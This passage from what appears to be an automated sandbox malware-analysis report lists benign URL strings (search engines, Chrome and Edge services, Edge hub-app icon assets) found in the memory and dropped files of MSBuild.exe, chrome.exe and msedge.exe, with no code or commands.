                Source: MSBuild.exe, 0000000F.00000002.2011477912.0000000003FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/typescript/component_libraries/dwg-components/src/index.web-vfl
                Source: chrome.exe, 00000011.00000003.1435337736.000046FC02E49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425922823.000046FC02E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425238109.000046FC02E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1447131679.000046FC02E49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432499490.000046FC02E44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                Source: chrome.exe, 00000011.00000003.1435337736.000046FC02E49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425922823.000046FC02E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425238109.000046FC02E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1447131679.000046FC02E49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432499490.000046FC02E44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2011477912.000000000402A000.00000004.00000020.00020000.00000000.sdmp, zmy5pp.15.dr, jwb1v3.15.dr, Web Data.21.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2011477912.000000000402A000.00000004.00000020.00020000.00000000.sdmp, zmy5pp.15.dr, jwb1v3.15.dr, Web Data.21.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chrome.exe, 00000011.00000003.1425865507.000046FC02EC4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1550361863.00000C3400194000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                Source: manifest.json.21.drString found in binary or memory: https://chrome.google.com/webstore/
                Source: chrome.exe, 00000011.00000003.1426047811.000046FC030FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1433110329.000046FC030FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432949648.000046FC02584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1478927911.000046FC02EE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425524155.000046FC02EE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425865507.000046FC02EC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                Source: msedge.exe, 00000013.00000002.1550361863.00000C3400194000.00000004.00000800.00020000.00000000.sdmp, manifest.json.21.drString found in binary or memory: https://chromewebstore.google.com/
                Source: 1ddcd8e3-07be-4b08-a481-09c222a4e74b.tmp.22.drString found in binary or memory: https://clients2.google.com
                Source: chrome.exe, 00000011.00000003.1406464876.00004410002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1406481374.00004410002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                Source: chrome.exe, 00000011.00000003.1435337736.000046FC02E49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425922823.000046FC02E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425238109.000046FC02E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1447131679.000046FC02E49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432499490.000046FC02E44000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1548231835.00000C3400020000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.21.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: 1ddcd8e3-07be-4b08-a481-09c222a4e74b.tmp.22.drString found in binary or memory: https://clients2.googleusercontent.com
                Source: 1ddcd8e3-07be-4b08-a481-09c222a4e74b.tmp.22.drString found in binary or memory: https://cm.mgid.com
                Source: MSBuild.exe, 0000000F.00000002.2006634073.000000000100B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2013453032.00000000043EA000.00000004.00000020.00020000.00000000.sdmp, 2noh4e.15.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                Source: MSBuild.exe, 0000000F.00000002.2006634073.000000000100B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2013453032.00000000043EA000.00000004.00000020.00020000.00000000.sdmp, 2noh4e.15.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: chrome.exe, 00000011.00000003.1447294908.000046FC02FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                Source: Reporting and NEL.22.drString found in binary or memory: https://deff.nelreports.net/api/report
                Source: Reporting and NEL.22.dr, 2cc80dabc69f58b6_0.21.dr, 4cb013792b196a35_0.21.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: Reporting and NEL.22.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
                Source: chrome.exe, 00000011.00000003.1455993281.000046FC03A5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
                Source: chrome.exe, 00000011.00000003.1432562852.000046FC02525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                Source: chrome.exe, 00000011.00000003.1451551802.000046FC03314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                Source: chrome.exe, 00000011.00000003.1451551802.000046FC03314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2ation.Result
                Source: chrome.exe, 00000011.00000003.1451551802.000046FC03314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2dbframe
                Source: chrome.exe, 00000011.00000003.1435337736.000046FC02E49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425922823.000046FC02E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425238109.000046FC02E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1447131679.000046FC02E49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432499490.000046FC02E44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2011477912.000000000402A000.00000004.00000020.00020000.00000000.sdmp, zmy5pp.15.dr, jwb1v3.15.dr, Web Data.21.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2011477912.000000000402A000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1435337736.000046FC02E49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425922823.000046FC02E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425238109.000046FC02E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1447131679.000046FC02E49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432499490.000046FC02E44000.00000004.00000800.00020000.00000000.sdmp, zmy5pp.15.dr, jwb1v3.15.dr, Web Data.21.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chrome.exe, 00000011.00000003.1435337736.000046FC02E49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425922823.000046FC02E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425238109.000046FC02E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1447131679.000046FC02E49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432499490.000046FC02E44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabj
                Source: chrome.exe, 00000011.00000003.1435337736.000046FC02E49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425922823.000046FC02E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425238109.000046FC02E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1447131679.000046FC02E49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432499490.000046FC02E44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2011477912.000000000402A000.00000004.00000020.00020000.00000000.sdmp, zmy5pp.15.dr, jwb1v3.15.dr, Web Data.21.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: chrome.exe, 00000011.00000003.1435337736.000046FC02E49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425922823.000046FC02E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1425238109.000046FC02E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1447131679.000046FC02E49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432499490.000046FC02E44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icoport
                Source: 000003.log11.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
                Source: 000003.log11.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
                Source: 000003.log11.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
                Source: 000003.log.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr, HubApps Icons.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr, HubApps Icons.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr, HubApps Icons.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
                Source: 000003.log11.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr, HubApps Icons.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr, HubApps Icons.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr, HubApps Icons.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr, HubApps Icons.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
